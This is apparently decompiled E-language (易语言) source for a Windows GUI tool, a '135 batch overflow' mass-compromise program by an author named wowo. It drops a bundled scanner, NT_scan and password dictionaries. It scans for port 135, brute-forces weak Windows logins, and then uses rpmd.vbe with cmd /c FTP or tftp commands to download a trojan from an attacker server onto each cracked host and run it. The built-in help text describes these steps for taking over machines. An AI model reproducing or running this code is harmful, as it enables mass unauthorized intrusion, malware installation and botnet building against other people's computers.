 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 562
    高度 = 331
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\_启动窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “135傻瓜批量溢出器v1.0版 By:Wowo Http://www.sswowo.com”
    帮助文件名 = “”



.声音 S扫描器, " ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\S扫描器", , 
.声音 , , , 
.声音 NTSCAN, " ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\NTSCAN", , 
.声音 用户字典, " ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\用户字典", , 
.声音 密码字典, " ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\密码字典", , 
.声音 溢出VBE, " ' 已保存到：D:\易语言学习\Data\135自动抓鸡.e\溢出VBE", , 


 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' iext2 AF6AD80AA4244A59AFB3D83ECF5173CC 1 1 扩展界面支持库二
 ' eAPI F7FC1AE45C5C4758AF03EF19F18A395D 1 1 应用接口支持库





.窗口程序集 窗口程序集1, , , 

.子程序 __启动窗口_创建完毕, 空白型, , 
.局部变量 s扫描器文件号, 整数型, , , 
.局部变量 匿名局部变量_43, 空白型, , , 
.局部变量 NTSCAN文件号, 整数型, , , 
.局部变量 用户字典文件号, 整数型, , , 
.局部变量 密码字典文件号, 整数型, , , 
.局部变量 溢出VBE文件号, 整数型, , , 

.如果真 (取反 (文件是否存在 (相加 (取运行目录 (), “\s.exe”))))
    赋值 (s扫描器文件号, 打开文件 (相加 (取运行目录 (), “\s.exe”), #改写, ))
    .如果真 (取反 (写出字节集 (s扫描器文件号, #S扫描器)))
        信息框 (“写出文件s.exe 失败!”, 0, )
    .如果真结束
    关闭文件 (s扫描器文件号)
    
.如果真结束


.如果真 (取反 (文件是否存在 (相加 (取运行目录 (), “\NT_scan.exe”))))
    赋值 (NTSCAN文件号, 打开文件 (相加 (取运行目录 (), “\NT_scan.exe”), #改写, ))
    .如果真 (取反 (写出字节集 (NTSCAN文件号, #NTSCAN)))
        信息框 (“写出文件NT_scan.exe 失败!”, 0, )
    .如果真结束
    关闭文件 (NTSCAN文件号)
    
.如果真结束

.如果真 (取反 (文件是否存在 (相加 (取运行目录 (), “\NT_user.dic”))))
    赋值 (用户字典文件号, 打开文件 (相加 (取运行目录 (), “\NT_user.dic”), #改写, ))
    .如果真 (取反 (写出字节集 (用户字典文件号, #用户字典)))
        信息框 (“写出文件NT_user.dic 失败!”, 0, )
    .如果真结束
    关闭文件 (用户字典文件号)
    
.如果真结束

.如果真 (取反 (文件是否存在 (相加 (取运行目录 (), “\NT_pass.dic”))))
    赋值 (密码字典文件号, 打开文件 (相加 (取运行目录 (), “\NT_pass.dic”), #改写, ))
    .如果真 (取反 (写出字节集 (密码字典文件号, #密码字典)))
        信息框 (“写出文件NT_pass.dic 失败!”, 0, )
    .如果真结束
    关闭文件 (密码字典文件号)
    
.如果真结束

.如果真 (取反 (文件是否存在 (相加 (取运行目录 (), “\rpmd.vbe”))))
    赋值 (溢出VBE文件号, 打开文件 (相加 (取运行目录 (), “\rpmd.vbe”), #改写, ))
    .如果真 (取反 (写出字节集 (溢出VBE文件号, #溢出VBE)))
        信息框 (“写出文件rpmd.vbe 失败!”, 0, )
    .如果真结束
    关闭文件 (溢出VBE文件号)
    
.如果真结束





.子程序 _扫描135按钮_被单击, 空白型, , 
运行 (相加 (“s.exe syn ”, ., “ ”, ., “ ”, .内容, “ ”, .内容, “ /save”), 假, )
信息框 (“s扫描器已经开始扫描..请在扫描完成后进行第2步.筛选135端口机器”, 0, )


.子程序 _批量溢出按钮_被单击, 空白型, , 
.局部变量 文件号, 整数型, , , 
.局部变量 文本, 文本型, , , 
.局部变量 i, 整数型, , , 

 ' 溢出格式 (“127.0.0.1 administrator 123”)
赋值 (文件号, 打开文件 (相加 (取运行目录 (), “\ruo.txt”), #读入, ))
.判断循环首 (取反 (是否在文件尾 (文件号, )))
    赋值 (文本, 读入一行 (文件号))
    溢出格式 (文本)
    赋值 (i, 相加 (i, 1))
    .如果真 (等于 (求余数 (i, 50), 0))
        延时 (相乘 (到数值 (.内容), 1000))
    .如果真结束
    
.判断循环尾 ()
信息框 (“所有溢出指令发送完毕...请等待主机上线! 如有疑问请上 http://user.qzone.qq.com/181813737 反馈！.”, 0, )

.子程序 溢出格式, 空白型, , 
.参数 文本, 文本型, , 

.局部变量 文本树组, 文本型, , "0", 
.局部变量 用户名, 文本型, , , 
.局部变量 IP地址, 文本型, , , 
.局部变量 密码, 文本型, , , 
.局部变量 文件号, 整数型, , , 
.局部变量 F1命令文本, 文本型, , , 
.局部变量 F2命令文本, 文本型, , , 
.局部变量 T1命令文本, 文本型, , , 
.局部变量 T2命令文本, 文本型, , , 

赋值 (文本树组, 分割文本 (文本, “ ”, ))
重定义数组 (文本树组, 真, 相加 (取数组成员数 (文本树组), 1))
赋值 (IP地址, 删首尾空 (文本树组 [1]))
赋值 (用户名, 删首尾空 (文本树组 [2]))
赋值 (密码, 删首尾空 (文本树组 [3]))
 ' 文件号 ＝ 打开文件 (取运行目录 () ＋ “\test.txt”, #改写, )


 ' 信息框 (IP地址, 0, )
 ' 信息框 (用户名, 0, )
 ' 信息框 (密码, 0, )
.如果 (等于 (.选中, 真))
    .如果 (等于 (.选中, 真))
        赋值 (F1命令文本, 相加 (“cscript rpmd.vbe ”, #引号, IP地址, #引号, “ ”, #引号, 用户名, #引号, “ ”, #引号, 密码, #引号, “ ”, #引号, “cmd /c @echo open ”, 删首尾空 (.), “ ”, 删首尾空 (.内容), “>>n1et.txt&@echo ”, 删首尾空 (.内容), “>>n1et.txt&@echo ”, 删首尾空 (.内容), “>>n1et.txt&@echo get ”, 删首尾空 (.内容), “ ”, 删首尾空 (.内容), “>>n1et.txt&@echo bye>>n1et.txt&@ftp -s:n1et.txt&del n1et.txt&”, 删首尾空 (.内容), “&”, 删首尾空 (.内容), “&”, 删首尾空 (.内容), “&del ”, 删首尾空 (.内容), #引号, “>>over.txt”))
         ' 信息框 (F1命令文本, 0, )
         ' 写出文本 (文件号, F1命令文本 ＋ #换行符)
        运行 (F1命令文本, 假, )
        
        
    .否则
        赋值 (F2命令文本, 相加 (“cscript rpmd.vbe ”, #引号, IP地址, #引号, “ ”, #引号, 用户名, #引号, “ ”, #引号, 密码, #引号, “ ”, #引号, “cmd /c @echo open ”, 删首尾空 (.), “ ”, 删首尾空 (.内容), “>>n1et.txt&@echo ”, 删首尾空 (.内容), “>>n1et.txt&@echo ”, 删首尾空 (.内容), “>>n1et.txt&@echo get ”, 删首尾空 (.内容), “ ”, 删首尾空 (.内容), “>>n1et.txt&@echo bye>>n1et.txt&@ftp -s:n1et.txt&del n1et.txt”, #引号, “>>over.txt”))
         ' 信息框 (F2命令文本, 0, )
         ' 写出文本 (文件号, F2命令文本 ＋ #换行符)
        
        运行 (F2命令文本, 假, )
        
        
    .如果结束
    
.否则
    .如果 (等于 (.选中, 真))
        赋值 (T1命令文本, 相加 (“cscript rpmd.vbe ”, #引号, IP地址, #引号, “ ”, #引号, 用户名, #引号, “ ”, #引号, 密码, #引号, “ ”, #引号, “cmd /c tftp.exe -i ”, 删首尾空 (.), “ get ”, 删首尾空 (.内容), “ ”, 删首尾空 (.内容), “&”, 删首尾空 (.内容), “&”, 删首尾空 (.内容), “&”, 删首尾空 (.内容), #引号, “>>over.txt”))
         ' 信息框 (T1命令文本, 0, )
         ' 写出文本 (文件号, T1命令文本 ＋ #换行符)
        运行 (T1命令文本, 假, )
        
    .否则
        
        赋值 (T2命令文本, 相加 (“cscript rpmd.vbe ”, #引号, IP地址, #引号, “ ”, #引号, 用户名, #引号, “ ”, #引号, 密码, #引号, “ ”, #引号, “cmd /c tftp.exe -i ”, 删首尾空 (.), “ get ”, 删首尾空 (.内容), “ ”, 删首尾空 (.内容), #引号, “>>over.txt”))
         ' 信息框 (T2命令文本, 0, )
         ' 写出文本 (文件号, T2命令文本 ＋ #换行符)
        运行 (T2命令文本, 假, )
        
        
    .如果结束
    
.如果结束
 ' 关闭文件 (文件号)


.子程序 _扫描弱口令按钮_被单击, 空白型, , 
信息框 (“即将启动NT_scan扫描器.请勾选主机文件选项.选择WMI扫描其他参数请自行参考设置!”, 0, )
运行 (“NT_scan.exe”, 假, )


.子程序 _筛选135按钮_被单击, 空白型, , 
.局部变量 文件号, 整数型, , , 
.局部变量 文本, 文本型, , , 
.局部变量 文本临时, 文本型, , , 
.局部变量 i, 整数型, , , 
.局部变量 写出临时, 文本型, , , 
.局部变量 结果文件号, 整数型, , , 

赋值 (文件号, 打开文件 (相加 (取运行目录 (), “\Result.txt”), #读入, ))
赋值 (文本, 读入文本 (文件号, ))
移到文件首 (文件号)
赋值 (结果文件号, 打开文件 (相加 (取运行目录 (), “\host.txt”), #重写, ))
.判断循环首 (取反 (是否在文件尾 (文件号, )))
    赋值 (文本临时, 读入一行 (文件号))
    赋值 (写出临时, 寻找截断 (文本临时, 0))
    赋值 (., 写出临时)
    赋值 (写出临时, .)
    .如果真 (不等于 (写出临时, “”))
        写出文本 (结果文件号, 相加 (写出临时, #换行符))
    .如果真结束
    
.判断循环尾 ()
关闭文件 (文件号)
关闭文件 (结果文件号)
信息框 (“筛选开启135端口机器成功.请接着执行第3步.扫描弱口令”, 0, )


.子程序 寻找截断, 文本型, , 
.参数 文本, 文本型, , 默认为0。0表示截断此字符后面所有字符.1表示
.参数 类型, 整数型, , 

.局部变量 i, 整数型, , , 
.局部变量 字符数组, 文本型, , "0", 
.局部变量 结果, 整数型, , , 
.局部变量 返回文本, 文本型, , , 
.局部变量 位置, 整数型, , , 
.局部变量 位置1, 整数型, , , 

赋值 (结果, 99999999)
 ' 信息框 (文本, 0, )
.如果 (等于 (类型, 1))
    插入成员 (字符数组, 1, “-”)
    插入成员 (字符数组, 2, “[”)
    插入成员 (字符数组, 3, “]”)
    插入成员 (字符数组, 4, “:”)
    插入成员 (字符数组, 5, “ ”)
    .变量循环首 (1, 取数组成员数 (字符数组), 1, i)
        赋值 (位置, 寻找文本 (文本, 字符数组 [i], 1, 假))
        赋值 (文本, 文本替换 (文本, 位置, 取文本长度 (字符数组 [i]), ))
    .变量循环尾 ()
    赋值 (返回文本, 文本)
.否则
    
    插入成员 (字符数组, 1, “-”)
    插入成员 (字符数组, 2, “[”)
    插入成员 (字符数组, 3, “]”)
    插入成员 (字符数组, 4, “:”)
    插入成员 (字符数组, 5, “ ”)
    .变量循环首 (1, 取数组成员数 (字符数组), 1, i)
        赋值 (位置, 寻找文本 (文本, 字符数组 [i], 1, 假))
        .如果真 (并且 (小于 (位置, 结果), 不等于 (位置, -1)))
            赋值 (结果, 位置)
        .如果真结束
        
    .变量循环尾 ()
    赋值 (返回文本, 取文本左边 (文本, 相减 (结果, 1)))
.如果结束
.如果真 (等于 (类型, 2))
    赋值 (位置, 寻找文本 (文本, “[”, 1, 假))
    .如果真 (不等于 (位置, -1))
        赋值 (文本, 文本替换 (文本, 位置, 取文本长度 (“[”), ))
    .如果真结束
    
     ' 信息框 (文本, 0, )
    赋值 (位置, 寻找文本 (文本, “ [NULL]”, 1, 假))
    .如果真 (不等于 (位置, -1))
        赋值 (文本, 文本替换 (文本, 位置, 取文本长度 (“ [NULL]”), ))
    .如果真结束
    
     ' 信息框 (文本, 0, )
    插入成员 (字符数组, 1, “]:  ”)
    插入成员 (字符数组, 2, “[”)
    插入成员 (字符数组, 3, “]”)
    插入成员 (字符数组, 4, “      ”)
    插入成员 (字符数组, 5, “     ”)
    插入成员 (字符数组, 6, “    ”)
    插入成员 (字符数组, 7, “   ”)
    插入成员 (字符数组, 8, “  ”)
    .变量循环首 (1, 取数组成员数 (字符数组), 1, i)
        赋值 (位置, 寻找文本 (文本, 字符数组 [i], 1, 假))
        .如果真 (不等于 (位置, -1))
            赋值 (文本, 文本替换 (文本, 位置, 取文本长度 (字符数组 [i]), 字符 (32)))
        .如果真结束
        
        
    .变量循环尾 ()
    赋值 (返回文本, 删首尾空 (文本))
    
.如果真结束

返回 (返回文本)

.子程序 过滤空格, 文本型, , 
.参数 文本, 文本型, , 

.局部变量 返回文本, 文本型, , , 
.局部变量 字符数组, 文本型, , "0", 
.局部变量 位置, 整数型, , , 
.局部变量 i, 整数型, , , 


赋值 (返回文本, 文本)
返回 (返回文本)

.子程序 _查看135按钮_被单击, 空白型, , 
运行 (相加 (“NOTEPAD.EXE ”, 取运行目录 (), “\Result.txt”), 假, )


.子程序 _帮助按钮_被单击, 空白型, , 
信息框 (相加 (“By:wowo QQ:181813737 MSN 25hourwowo@gmail.com blog:www.sswowo.com”, 字符 (13), 字符 (13), “135傻瓜批量溢出器v1.0版”, 字符 (13), 字符 (13), “步骤1.利用S扫描器快速扫描开启了135机器的端口.扫描结果保存在本程序目录下的Result.txt文件中.扫描完成后请执行第2步..中途可以使用查看135命令查看扫描中的结果!”, 字符 (13), 字符 (13), “步骤2.将Result.txt文件中的结果整理成第3步NT_scan扫描器可以识别的格式.以提供扫描.筛选后的结果存放在host.txt中.筛选完后请执行第3步打开NT_Scan扫描器扫描.”, 字符 (13), 字符 (13), “步骤3.利用NT_Scan扫描器快速扫描弱口令机器.扫描结果保存在NTscan.txt中.扫描完成后请执行第4步.中途可以使用查看弱口令命令查看扫描中的结果!”, 字符 (13), 字符 (13), “步骤4.这里就是最关键的一步了也是最后的一步.首先请选择您下载木马的方式.分FTP和TFTP两种.需要您有一台公网IP的机器来作为FTP服务器或者TFTP服务器.当然也可以利用申请的主机或者肉鸡.设置好以后直接开始溢出就OK了..”), 0, )
未知支持库函数_56 (“http://user.qzone.qq.com/181813737”)


.子程序 _筛选弱口令按钮_被单击, 空白型, , 
.局部变量 文件号, 整数型, , , 
.局部变量 文本, 文本型, , , 
.局部变量 结果文件号, 整数型, , , 
.局部变量 写出临时, 文本型, , , 
.局部变量 写出文本, 文本型, , , 
.局部变量 文本临时, 文本型, , , 

赋值 (文件号, 打开文件 (相加 (取运行目录 (), “\NTscan.txt”), #读入, ))
赋值 (文本, 读入文本 (文件号, ))
移到文件首 (文件号)
赋值 (结果文件号, 打开文件 (相加 (取运行目录 (), “\ruo.txt”), #重写, ))
.判断循环首 (取反 (是否在文件尾 (文件号, )))
    赋值 (文本临时, 读入一行 (文件号))
    赋值 (写出临时, 寻找截断 (文本临时, 2))
     ' IP编辑框1.地址 ＝ 写出临时
     ' 写出临时 ＝ IP编辑框1.地址
    写出文本 (结果文件号, 相加 (写出临时, #换行符))
.判断循环尾 ()
关闭文件 (文件号)
关闭文件 (结果文件号)
信息框 (相加 (“筛选弱口令机器完毕!请执行第5步批量溢出.!!并选择木马的下载方式.默认为FTP模式..”, 文本), 0, )

.子程序 _查看弱口令按钮_被单击, 空白型, , 
运行 (相加 (“NOTEPAD.EXE ”, 取运行目录 (), “\NTscan.txt”), 假, )

.子程序 _分组框2_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 




 ' 不属于任何一个程序集、类模块的函数：
